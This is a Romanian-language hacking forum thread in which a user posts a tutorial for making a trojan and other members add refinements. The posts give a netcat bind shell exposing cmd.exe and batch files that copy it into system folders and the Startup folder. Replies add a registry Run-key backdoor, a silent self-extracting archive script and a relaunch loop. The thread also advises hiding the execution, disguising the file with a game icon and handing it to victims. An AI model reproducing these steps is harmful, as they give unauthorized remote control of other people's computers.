Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
karina22
 | Femeie
25 ani
Bucuresti
cauta Barbat
25 - 54 ani |
|
BlackForce
Grand Master
 Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
Tutoial facut de BlackForce
 -------------------------------
Va voi prezenta in cele ce urmeaza o metoda relativ usoara pt a face un trojan
MAI intai trebuie sa faceti rost de doua programe
1)nC.exe (net capture)-----------cred ca stie toata lume ce face!!! nu mai e cazul sa explic .
2)Quick Batch File----------------Transforma un fisier cu extensia bat in unul cu extensia exe ,si cel mai important
are o optiune care permite rulare fisierelor in hide mode
Boon si acum sa incepem . luam un folder si bagam in el nC.exe Porgramul nC.exe poate face un shell la CMD folosind
un port ales de noi.Asta o facem cu :
nc -l -p PORT-ul -d -e cmd.exe
iar apoi ne conectam la computer folosind comanda Telnet IP port (exemplu telnet 54.76.21.34 2000 )
ori putty; care il vreti mie sincer imi place mai mult putty 
Daa... toate bune si frumoase in schimb ne izbim de o mare problema folosind comanda nc -l -p PORT-ul -d -e cmd.exe
nu e puem conecta de mai multe ori asfel dupa fiecare conectare portul este inchis automat !! cea ce nu este bine de aceea
folosim un mic artificiu sa facem un program care sa imi permita sa ma pot connecta de mai multe ori la computerul victimei
in folderul de care spuneam mai devreme punem doua fisiere care au extensia bat.Iar apoi incepem sa le scriem asfel ;
Doua fisiere
1)Start.bat
2)System.bat
In fisierul Start.bat scriem :
copy nc.exe c:windowstemp
copy System.exe c:windowstemp
c:
cd
cd "C:Documents and SettingsAll UsersStart MenuProgramsStartup"
copy c:windowstempSystem.exe
System.exe
Ce face acest program ?! Simplu copie cele doua fisiere in c:windowstemp si apoi copie un singur fisier (system.exe)in C:Documents and SettingsAll UsersStart MenuProgramsStartup
Boon assta inseamna ca de fiecare data cand ala aprinde calc i se va executa automat System.exe dar ce e asa de important D`le fisieru asta?!
Smplu System.exe are urmatoarele line
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
............................................................................................
de mai multe ori !!de vreo 100 de ori !
dupa aia fisierul System.bat il compilam cu Quick Batch File si avem un fisier System.exe
ATENTIE!!! trebuie a aiba optiunea HIDE MODE activa!!! pt ca executarea a se faca ascnus fara ca victima sa vada!!
daca vreti si sunteti mai luxosi puteti sa compilati si START.bat si sa ii schimbati pictograma in ua rmoasa de la un joc de ex si ii dati la un lamer si gata!
Avantaje e mic are 352 Kb nu il vede nici un antivirus si nici nu il va vedea vreodata cred
Nu imi ausm nici un fel de responsabilitate pt fatele savarsite de d-voastra in urma ciiri acestui articol !!!
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
 Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
In sfarsit, se mai discuta si altceva pe forum ! 
Frumos, tutorial. Felicitari !
As mai adauga ceva, si anume locul in care se pune fisierul. C:windowstemp nu e locul potrivit pentru ca un user care are cat de cat habar stie ca e bine sa stergi fisierele temporare din cand in cand. Ar fi mult mai sanatos sa se puna in C:windowssystem32 sau in program files in directorul unui program folosit care sigur nu il sterge (AV-ul, YM etc).
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
Ms mult OSHO
ai zis bine cu C:windowssystem32 dar cu program files nu prea sunt de acord (AV-ul, YM etc) de unde stiu eu ce are victima in program filles ?! si apoi eu vreau sa generalizez putin .
Pot fi calc si fara mes si fara AV (scuze fara Y!Messenger nu  ) dar mersi mult
Modificat de BlackForce (acum 17 ani)
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
k4hvd
Grand Master
 Din: Oradea
Inregistrat: acum 17 ani
Postari: 322
|
|
interesant. felicitari. 
|
|
| pus acum 17 ani |
|
DemoN Morph
Master of 127.0.0.1
 Inregistrat: acum 18 ani
Postari: 167
|
|
|
| pus acum 17 ani |
|
|
Zero_Cool
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 796
|
|
hmm daca e facut de la 0 de tine bravo !
Oricum n`am zis ca e copiat ! 
|
|
| pus acum 17 ani |
|
escalation666
Little Kevin
 Din: Valhalla
Inregistrat: acum 17 ani
Postari: 53
|
|
interesant tutorialul....numai ca:
1.nc nu este net capture ci netcat am mai vazut si in alte topicuri denumirea asta
2.ai putea face un fisier reg cu urmatorele si sa-l executi:
reg add hklm softwaremicrosoftwindowscurrentversion run /v backdoor /t reg_sz /d "nc -l -d -p portul_ales -e cmd.exe"
3.nc este detectat....cel putin antivirusul meu il detecteaza
4.esti BlackForce de pe pc-dojo?
|
|
| pus acum 17 ani |
|
Dynamyc
Elite Member
 Din: de peste tot
Inregistrat: acum 18 ani
Postari: 836
|
|
frumos tutorial! bv
_______________________________________
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
@Escalation666
1) da aici am gresit eu
2) de ce am facut asa ? pai daca il executa u il mai poate inchida poate sa se duca si in Task manager >Processes si daca cumva are si el habar de ceva inchide nc.exe dar deeaba pt ca eu acolo am pus
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
C:windowstempnc.exe -l -p PORT-ul -d -e cmd.exe
Adica ar trebui a il inchida e vreo 100 de ori sau omie cum l-am facut eu
In fine sa te-ai gandit u si apreciez
4)NU 
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
cititi aici ! all !
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
Mai hacker_D, daca tot ai nume de hacker de ce nu pui mana pe un manual de TCP/IP sa inveti macar cateva idei cat sa nu te faci de cacao pe forumuri ?
Pune ce port vrei, cu conditia sa nu fie deschis deja de o alta aplicatie.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
|
hacker_D
Grand Master
Din: De la voi de pe undeva
Inregistrat: acum 18 ani
Postari: 325
|
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
|
| pus acum 17 ani |
|
|
hacker_D
Grand Master
Din: De la voi de pe undeva
Inregistrat: acum 18 ani
Postari: 325
|
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
as veni cu o completare .Sa zicem ca vrem sa ii punem ramin sau ceva de genu ca sa ii vedem desk(sau chiar un trojan dar trebuie sters antivir) aasta o facem cu 2 comenzi 1 pe calc nostru si cea de a doua o controlam cu shell
aici mai multe info !!
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
|
hacker_D
Grand Master
Din: De la voi de pe undeva
Inregistrat: acum 18 ani
Postari: 325
|
|
eu dupa ce scriu nc -l -p 23 -d -e cmd.exe si apas enter imi sta multe min. (in timpul acesta nu mai pot sa scriu nimic ) -- si eu nu inteleg cum scriu Telnet ip_victima port daca nu pot sa scriu nimic in casuta de DOS
P.S. am asteptat vreo 20 de min odata dar dupa aia nu am mai putut rezista
_______________________________________
cel mai bun cracker a fost prins... merita sa vezi
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
Sta mult pentru ca s-a creat serverul si asteapta sa se conecteze clientul. Asa trebuie sa stea. Cat timp sta, asteapta conexiuni pe portul 23. Cand iti apare iar promptul s-a pierdut conexiunea.
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
|
hacker_D
Grand Master
Din: De la voi de pe undeva
Inregistrat: acum 18 ani
Postari: 325
|
|
|
| pus acum 17 ani |
|
KinG
Little Kevin
 Inregistrat: acum 18 ani
Postari: 79
|
|
care aveti deja un Trojan facut ??  sau makar unu la carantina sau unu copiat oricare nu conteneste , ca vreau sal pun p' site !
_______________________________________
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
pro rat cauta asta pe
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
|
rakon
Pe lista neagra
Inregistrat: acum 17 ani
Postari: 261
|
|
frumos tutorial blackforce..ms man
|
|
| pus acum 17 ani |
|
DogPound
Little Kevin
 Din: Room
Inregistrat: acum 17 ani
Postari: 85
|
|
hacker_D a scris:
bun tut. dar cum eu is n00b am 1 intrebare
1. ...
nc -l -p PORT-ul -d -e cmd.exe ->>tre sa pun un port anume sau trebuie sa scanez si sa vad ce port are victima? cu ce scanez sa vad ce port are victima daca.....??  |
foloseste si tu Fscan 
|
|
| pus acum 17 ani |
|
Rapperu_yo
Grand Master
 Din: Turbinkinstan
Inregistrat: acum 18 ani
Postari: 206
|
|
Bun tutorial blackforce si Ms .... foarte util
_______________________________________
<--=@ @=-->
|
|
| pus acum 17 ani |
|
|
Jedy_08
Membru nou
Din: pitesti
Inregistrat: acum 17 ani
Postari: 9
|
|
dk mi-ar spune si mie ce e un port si la ce foloseste :d scuzati-mi intrebarea da sut incepator
_______________________________________
Sunt incepator.....adik vreau sa invat
|
|
| pus acum 17 ani |
|
RockWilder
Elite Member
 Din: Real World!
Inregistrat: acum 17 ani
Postari: 894
|
|
Jedy_08 a scris:
dk mi-ar spune si mie ce e un port si la ce foloseste :d scuzati-mi intrebarea da sut incepator |
Un port este ca un fel de "portita" care permite rularea anumitor servicii pe calculatorul tau!
@BlackForce: Chiar fain tutorialu... nu l-am zarit pana acum !
Modificat de RockWilder (acum 17 ani)
_______________________________________
Only those who attempt the absurd will achieve the impossible. (M C Escher)
|
|
| pus acum 17 ani |
|
OSHO
Elite Member
Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069
|
|
Jedy_08 a scris:
dk mi-ar spune si mie ce e un port si la ce foloseste :d scuzati-mi intrebarea da sut incepator |
RTFM
P.S.
Care ii raspunde, are ban permanent de la mine.
LE: Exceptie RockWilder care a postat cu o secunda inaintea mea
Modificat de OSHO (acum 17 ani)
_______________________________________
IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
RockWilder ms .... mai vreau sa mai fac unu dar nu prea imi iese trebe sa mai invatz...ceva......tot un fel de trojan
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
M4ST3R
Membru nou
 Inregistrat: acum 17 ani
Postari: 12
|
|
O intrebare:
Daca fac o arhiva SFX (RAR) in care bag fisierele NC.exe System.exe si Start.bat ..... si setez HIDDEN atributele la NC.exe si System.exe , ca acestea sa nu fie vazute de victima dupa ce extrage arhiva, victima sa vada doar start.bat.....cum pot sa copiez NC.exe si System.exe in SYSTEM32 ????? daca acestea sunt HIDDEN, folosint urmatoarea secventa de cod:
-------------------------------------------------------------------
copy nc.exe c:windowssystem32
copy System.exe c:windowssystem32
c:
cd
cd "C:Documents and SettingsAll UsersStart MenuProgramsStartup"
copy c:windowssystem32System.exe
System.exe
-----------------------------------------------------------------
pentru ca secventa de mai sus functioneaza doar daca nc.exe si System.exe NU SUNT hidden
Cum trebuie sa arata codul sursa ca aceste 2 fisiere sa fie copiate in system32 kiar daca sunt Hidden?????????
Astept raspuns!!!!
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
SFX-ul tau trebe sa arate cam asa :
;The comment below contains SFX script commands
Path=C:WINDOWSsystem32
SavePath
Setup=start.bat
Presetup=start.bat
Silent=1
Overwrite=2
faci ca extragerea sa se faca in C:WINDOWSsystem32 iar dupa instalare sa se execute Start.bat
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
|
h4zz4rD
Membru nou
Inregistrat: acum 17 ani
Postari: 3
|
|
Da, tare chestia, da totusi mi se pare umpic cam ineficienta metoda folosita ca sa porneasca la logon si sa se deschida de mai multe ori, sunt prea multe fisiere si mai ales nc.exe are sa fie deschis de aprox 100 ori in acelasi timp, binenteles in task manager o sa apara da 100 ori, suficient cat sa bata la ochi, uitati la ce m-am gandit eu:
-------------------------------------------------------------------------------
:caca
start /wait nc -l -p PORT -d -e cmd.exe
if not exist "%userprofile%Start MenuProgramsStartuptrojan.exe" copy trojan "%userprofile%Start MenuProgramsStartup"
goto caca
------------------------------------------------------------------------------
cu optiunea /wait de la start nc.exe nu o sa porneasca din nou decat dupa ce se inchide cel curent.
Mie mi se pare ceva mai simplu asa.
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
h4zz4rD a scris:
Da, tare chestia, da totusi mi se pare umpic cam ineficienta metoda folosita ca sa porneasca la logon si sa se deschida de mai multe ori, sunt prea multe fisiere si mai ales nc.exe are sa fie deschis de aprox 100 ori in acelasi timp, binenteles in task manager o sa apara da 100 ori, suficient cat sa bata la ochi |
Permite-mi sa te corectez .
1) In Task nu appare decat 2 fisiere NC.exe si celalalt pe care il faci u .
2)Nu o sa se execute de 100 de ori fisierul NC.exe ci o data.De fiecare data cand victima incearcasa scoata din procese nc.exe se va executa di nou alt NC de pe aceasia ramura a secventei liniara.
3)Cu IF-uri Hmmmm ... Sincer interesant.... mersi pt completari .
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
axedee
Membru nou
 Inregistrat: acum 17 ani
Postari: 2
|
|
sal blackforce, una dintre chestii e k Quick Batch File e versiunea trial. pot sa o folosesc p aia
?
|
|
| pus acum 17 ani |
|
|
pail18mts
Membru nou
Inregistrat: acum 17 ani
Postari: 1
|
|
Nu va mai chinuiti cu chestii ascunse si executabile ca cu proces explorer se vede si unde e fisierul ascuns. incercati sa face-ti si voi un lucru bun pe lumea asta si nu mai pierdeti timpul cu prostii. 
|
|
| pus acum 17 ani |
|
BlackForce
Grand Master
Din: Bacau
Inregistrat: acum 17 ani
Postari: 252
|
|
axedee da poti sa il folosesti si pe ala.
pail18mts te rog frumos sa itzi raspunzi la cateva intrebari si dupa aia sa iei o decizie:
1)ce pana mea cauti u pe un forum de hacking?
2)ce intelegi u prin LUCRU BUN?
3)daca crezi ca nu am facut ceva bine , te rog frumos sa ma corectezi ok ?!
da intradevar respectivul user va observa ceva la procese dar nu cred ca il va inchide daca nu se prinde ca cineva ii umbla prin calc.
_______________________________________
Pe poteci strâmte si abrupte se ajunge la fapte mari.(V. Hugo )
|
|
| pus acum 17 ani |
|
